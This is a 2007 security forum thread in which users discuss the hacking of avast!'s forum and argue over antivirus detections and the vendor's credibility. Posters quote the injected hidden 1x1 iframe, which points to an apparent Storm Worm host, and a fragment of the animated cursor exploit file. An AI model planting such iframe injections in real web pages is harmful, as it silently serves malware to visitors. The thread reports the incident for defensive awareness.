Alwil's credibility just hit the ground floor like an elevator with the wires cut...

Go here and see what NOD32 does: h__p://forum.avast.com/

{QUOTE-> Alwil's credibility just hit the ground floor like an elevator with the wires cut...

Go here and see what NOD32 does: h__p://forum.avast.com/ <-QUOTE}

Hmm... surprising, yet common sense says FP.

Possibly, BUT...Avast! itself picks it up...so their own signatures are picking it up on their own site!

F-Prot flags it also. Starting to sound like a legit detection. It isn't on Avast's site though, you are getting redirected to Media Count. It only works in IE. FF and Opera don't get it, at least on my system.

Exactly, which is why I just uninstalled Avast!, wrote a fairly abrupt e-mail to their research team and came back here looking for sanity! I think I found it in the form of NOD32 AV Beta. I've been a long term NOD32 user and I've been waiting for this...at last...!!! :)

Run an On Demand Scan and then look at your log.

Oooer ???

This cannot be good. Picked up in Firefox and IE. If other AVs are picking it up then something is a bit fishy.

{QUOTE-> Run an On Demand Scan and then look at your log. <-QUOTE}

Doing it now...

{QUOTE-> Oooer ???

This cannot be good. Picked up in Firefox and IE. If other AVs are picking it up then something is a bit fishy. <-QUOTE}

I only get it in IE, not in FF, perhaps that ad blocking plug in stops it.

{QUOTE-> Doing it now... <-QUOTE}

In depth scan finished: Clean machine...

{QUOTE-> In depth scan finished: Clean machine... <-QUOTE}


Look at the log, do you have a bunch of "internal errors"?

Haven't made a scan yet - might do it later, just to see if NOD32 picks something up in general. I got the warning/infection message in Opera though.

I think the internal errors are only related to the new ESS/NOD32 AV beta. NOD 2.7 is running fine - no internal errors or anything like that here.

{QUOTE-> Look at the log, do you have a bunch of "internal errors"? <-QUOTE}

No. I'm looking for that specific string, yes? Nothing...

OK...just one, but nothing to do with anything...

24/08/2007 23:03:56 D:\APPS\INSTALL PACK\Microsoft\Powerpoint Hotfix\258563_intl_i386_zip.exe » ZIP » office2003-KB912022-GLB.exe - internal error

Noticed this earlyer.
Thought LSP was giving me a FP.
Maybe not.
Site may have been hacked ???
I know this has happened to other sites forum and not in the past.
Anyone else can confirm this?

{QUOTE-> I think the internal errors are only related to the new ESS/NOD32 AV beta. NOD 2.7 is running fine - no internal errors or anything like that here. <-QUOTE}

Correct, 2.7 works like a charm.

{QUOTE-> Noticed this earlyer.
Thought LSP was giving me a FP.
Maybe not.
Site may have been hacked ???
I know this has happened to other sites forum and not in the past.
Anyone else can confirm this? <-QUOTE}

Yup...

{QUOTE-> No. I'm looking for that specific string, yes? Nothing...

OK...just one, but nothing to do with anything...

24/08/2007 23:03:56 &nbsp;D:\APPS\INSTALL PACK\Microsoft\Powerpoint Hotfix\258563_intl_i386_zip.exe » ZIP » office2003-KB912022-GLB.exe - internal error <-QUOTE}

I have thousands of them. 228 pages in a word document!!

Hacking is looking quite likely here :-\

{QUOTE-> Hacking is looking quite likely here :-\ <-QUOTE}

Yup. Sure looks that way(More Likely). Or quite a few different AV's and Link Scanner are giving FPs(Less Likely).

We'll alter the clickable links for the time being until it's determined what....IF anything is going on. We'll also caution any that wish to still visit the link.

<iframe src='h__p://mediacount.net/strong/020sdsfg' width=1 height=1></iframe>

Thanks
Bubba
192868

I guess it is possible that it could be an FP. it is an ad/media link being flagged, so it may be the way that the Ad/link is implemented that appears malicious. Could happen. *shrugs*

Hehe.. Just a bit funny though that many others detect it also then. ::)

Thats what I mean. It may be a suspicious implementation of something that is triggering the AV response. Of course, it may most likely be a real threat. Havent seen one in months

Quite exciting to get a real alert for once...

{QUOTE-> Of course, it may most likely be a real threat. <-QUOTE}It is a real threat at the moment due to the iframe code and link still available at Avast.

Windows Animated Cursor Stack Overflow Vulnerability (http://www.determina.com/security.research/vulnerabilities/ani-header.html)

portion of the ani code from the mediacount.net/strong/020sdsfg/324123.htm link

{QUOTE-> RIFFACONanih$$ÿÿ 
TSILTSILanih¨ ¢@ 1Éf�Á8ë^ëèøÿÿÿƒÆ <-QUOTE}

We have also moved this to a more appropriate forum so others that visit the Avast Forums can be made aware.

Procede with caution,
Bubba

{QUOTE->
Quite exciting to get a real alert for once... <-QUOTE}

Glad to oblige... ;D

{QUOTE-> Glad to oblige... ;D <-QUOTE}

Lol ;) it is much appreciated :P

Im quite interested to see if there is any more news on it. Call it morbid, but I want to know what effect this malware has had.

{QUOTE-> Lol ;) it is much appreciated :P

Im quite interested to see if there is any more news on it. Call it morbid, but I want to know what effect this malware has had. <-QUOTE}

I would guess that most of the 'effect' was to knock Alwil's credibility. It had the desired effect on me anyway - brought me back here! And I'm happy with what I find...NOD32 AV Beta is running sweetly so far...

{QUOTE-> I would guess that most of the 'effect' was to knock Alwil's credibility. It had the desired effect on me anyway - brought me back here! And I'm happy with what I find...NOD32 AV Beta is running sweetly so far... <-QUOTE}

I find that you just cannot beat NOD... for me anyway. It is always a matter of opinion. I would love to install the beta, but im waiting for the internal error problem to be sorted.

Sorry for the off topic mods!

Anyway, back on topic, its doing the job for me, because it is still there! Surely it should be fixed by now! Just take the forums offline for a bit!

It is still infected.

Now getting a "404 Not Found" error when attempting to visit. Firefox and IE7.

Norton is also showing it as infected.

And now (linking from the Avast home page) "Down for Maintenance."

Interesting, but I don't see it as hurting their credibility. Maybe their pride, but Avast did detect it right? Even banks and Government sites get hacked. Anyways, it's good to see it reported and it's getting fixed.

{QUOTE-> Interesting, but I don't see it as hurting their credibility. Maybe their pride, but Avast did detect it right? Even banks and Government sites get hacked. Anyways, it's good to see it reported and it's getting fixed. <-QUOTE}

True...and yes, it did...

Thanks JeremyWW, It's good to see Avast caught it. I wish I saw this post earlier so I could try my setup in shadow mode. It's not often one gets to see malware without looking for it. Good find :)

{QUOTE-> Thanks JeremyWW, It's good to see Avast caught it. I wish I saw this post earlier so I could try my setup in shadow mode. It's not often one gets to see malware without looking for it. Good find :) <-QUOTE}

Yep, cheers Jeremy :thumb:

As has been said, at least now it is being fixed. And maybe they will consider measures to prevent it happening again.

{QUOTE-> We'll alter the clickable links for the time being until it's determined what....IF anything is going on. We'll also caution any that wish to still visit the link.

<iframe src='h__p://mediacount.net/strong/020sdsfg' width=1 height=1></iframe>

Thanks
Bubba
192868 <-QUOTE}

Here's a screen capture of mediacount.net:

I just had an e-mail from Alwil. It's anonymous - obviously - but states what's happening:

"We found that software used to run forum on our pages is vulnerable and have to be changed/updated (but there is probably no update available for this code inhections exploit). We have to find the best solution to this problem. The forum will be off until the solution will be found."

JeremyWW - I am a fairly regular poster on the avast! forum and have not received that email. Given that it was sent anonymously I would question its source.

{QUOTE-> JeremyWW - I am a fairly regular poster on the avast! forum and have not received that email. Given that it was sent anonymously I would question its source. <-QUOTE}

Sorry, my post was confusing - I meant I was quoting it here anonymously. I know precisely who it's from. I was the first one to notify them directly by e-mail last night which is why I've had the dialogue with them. I suggest you e-mail them at 'virus at avast dot com', and ask for an explanation, as I did.

It is down for maintenance now. ::)

{QUOTE-> Sorry, my post was confusing - I meant I was quoting it here anonymously. I know precisely who it's from. I was the first one to notify them directly by e-mail last night which is why I've had the dialogue with them. I suggest you e-mail them at 'virus at avast dot com', and ask for an explanation, as I did. <-QUOTE}
My mistake ... :)

I emailed one of the developers last evening (without asking for a response) so at least you and I are trying to accomplish the same thing. Its interesting that this attack started at the beginning of the weekend when staff would be low. But I'm sure they'll get it sorted.

Visited te link with IE7, Opera and FF.

hxxp://mediacount. net /strong/ 020sdsfg/

I get it with all.

mediacount is Storm Worm (WORM/Zhelatin / Nuwar) site.

aigle,
Have you tried visiting the site with IE GeSWall'ed (to track the flow of events)?

Nothing was executed on my system.
I stopped on this message. GW log is attached.

That page is trying to install/run a MDAC component? Interesting.

This is really scary.... I hope I wasn't infected.

Whilst it might be an embarrassment to have the forum software hacked through a vulnerability, at no time were avast users vulnerable to the attack. As has been said avast detected the infection.

Whilst Firefox and Opera weren't vulnerable to the attach, those with IE or an IE clone, would have had the Web Shield block the attempt to infect.

I too got an email from one of the Alwil team as l too reported it to avast, so it would apear that only those who contacted avast like JeremyWW got an email.

{QUOTE-> Whilst it might be an embarrassment to have the forum software hacked through a vulnerability, at no time were avast users vulnerable to the attack. As has been said avast detected the infection.

Whilst Firefox and Opera weren't vulnerable to the attach, those with IE or an IE clone, would have had the Web Shield block the attempt to infect.

I too got an email from one of the Alwil team as l too reported it to avast, so it would apear that only those who contacted avast like JeremyWW got an email. <-QUOTE}

And where will the next vulnerability be David? If they can hack the forum, what else can they hack...? I am not 'attacking' Alwil here - I've not yet heard of this happening to a 'Security Company' - my confidence is down. I am not currently running Avast!

In my view they should now send a 'mass mail shot' to every Forum user with a brief but understandable explanation.

Jeremy

{QUOTE->
Whilst Firefox and Opera weren't vulnerable to the attach, those with IE or an IE clone, would have had the Web Shield block the attempt to infect. <-QUOTE}

This was my experience when attempting to visit the forum using IE; the Avast webshield blocked it.

{QUOTE-> I've not yet heard of this happening to a 'Security Company' - my confidence is down. I am not currently running Avast! <-QUOTE}

Personally my confidence in Avast is unchanged. So the forum had a vulnerability, OK, not the best, but look at (a) how quickly it was fixed, and (b) the somewhat ironic fact of the associated AV being able to block it.

Remember when Castlecops was down not so long ago following a large DOS attack. Hardly a security company, but really at least as serious a contender in the anti-malware brigade as any AV vendor, I would think.

I do agree the avast team should send a mass email to the forum users.

It wasn't avast! or Alwil that had a vulnerability.
It was the forum software that had a problem.
It was avast! that stopped the vulnerability from infecting the members system.

The only thing they need to do is post an explanation on either their website or the forum itself. IMHO :)

{QUOTE-> It wasn't avast! or Alwil that had a vulnerability.
It was the forum software that had a problem.
It was avast! that stopped the vulnerability from infecting the members system.

The only thing they need to do is post an explanation on either their website or the forum itself. IMHO :) <-QUOTE}


I agree.

{QUOTE-> And where will the next vulnerability be David? If they can hack the forum, what else can they hack...? I am not 'attacking' Alwil here - I've not yet heard of this happening to a 'Security Company' - my confidence is down. I am not currently running Avast!

In my view they should now send a 'mass mail shot' to every Forum user with a brief but understandable explanation.

Jeremy <-QUOTE}

Well I don't speculate on what the next vulnerability might be in the Simple Machines forum software, considering this is the first occasion this has happened in the three and a half years I have been on the forums. Even though the iframe injection was there in the PHP forum software, avast did after all detect it with the web shield so it was intercepted before it got on to any users system.

I'm not in favour of mass mailings, you would have to send an email to 34,684 members, the current number and not all of those will be active and those that are will probably be aware of it.

So I too feel a notification in the forums would suffice.

site's back up. ;D

{QUOTE-> So I too feel a notification in the forums would suffice. <-QUOTE}
OK, Agree. Mass email would be a bit ott I guess.

{QUOTE-> Whilst it might be an embarrassment to have the forum software hacked through a vulnerability, at no time were avast users vulnerable to the attack. As has been said avast detected the infection. <-QUOTE}

avast! detected the exploit served up to IE users, but not that fed to Firefox users.

~Virustotal results removed per forum policy....Bubba~

Aigle, who reported the shellcode.gen malware on the site previously, was using AntiVir, one of few AV's to detect this. The exploit doesn't seem to affect current versions of Firefox, so up-to-date users will not have been infected, but may find the malware in their Firefox cache in later scans (for example with AVG Anti-Spyware) or their own AV if and when the malware is added.

Ok, 'scuse my ignornace, but where exactly can I find this rule that I can't post Virus Total results??

http://www.wilderssecurity.com/showthread.php?t=180057{QUOTE-> Threads like that, showing a screen shot or results of a specific detection made by one or more anti-virus products, and show others missing the sample are not of any real value. Files can be found that any AV will get a hit on and others will miss. We could post threads like that, with or without Jotti or VirusTotal results included, all day long and still be none the wiser for it. <-QUOTE}

Thank you.

I would suggest that it would be a common courtesy to new users to point out such rulings when imposing them.

In this particular case, I think to apply that rule was silly, because I was not trying to point score about which AV is better or worse than another, but to inform other forum members about the nature of the malware infecting the avast ! website for a short period, to raise the issue of whether Firefox users might have been at risk from malware specifically served up to Firefox users and to let forum members know that they might detect malware in their browser cache with subsequent scans by other products, and indeed might be at risk of having been infected if they were using an out-of-date an vulnerable browser.

What was the nature of the Trojan? Which browsers was it targeted at? What exploits did it use? Which other commonly used anti-malware programs might detect this malware?

These are questions that without the Virus Total information cannot be answered, so anybody interested will just have to trundle over to the avast! forum were the same results are still available.

{QUOTE-> avast! detected the exploit served up to IE users, but not that fed to Firefox users. <-QUOTE}

Just for your information, the Firefox script that was present on the hacked forum was just a downloader of a malicious executable. That executable was being detected by avast, though - so the situation was quite similar to the IE case (no danger).

Fortunately.

Thanks,
Vlk

The moral of this tale is to don't go to forums or you will catch a communicable virus. ;D ;) ::)

{QUOTE-> The moral of this tale is to don't go to forums or you will catch a communicable virus. ;D ;) ::) <-QUOTE}
;D ;D ;D roflol....good one!!!

{QUOTE-> And where will the next vulnerability be David? If they can hack the forum, what else can they hack...? I am not 'attacking' Alwil here - I've not yet heard of this happening to a 'Security Company' - my confidence is down. I am not currently running Avast!

In my view they should now send a 'mass mail shot' to every Forum user with a brief but understandable explanation.

Jeremy <-QUOTE}
I distinctly remember something about Kaspersky being hacked once...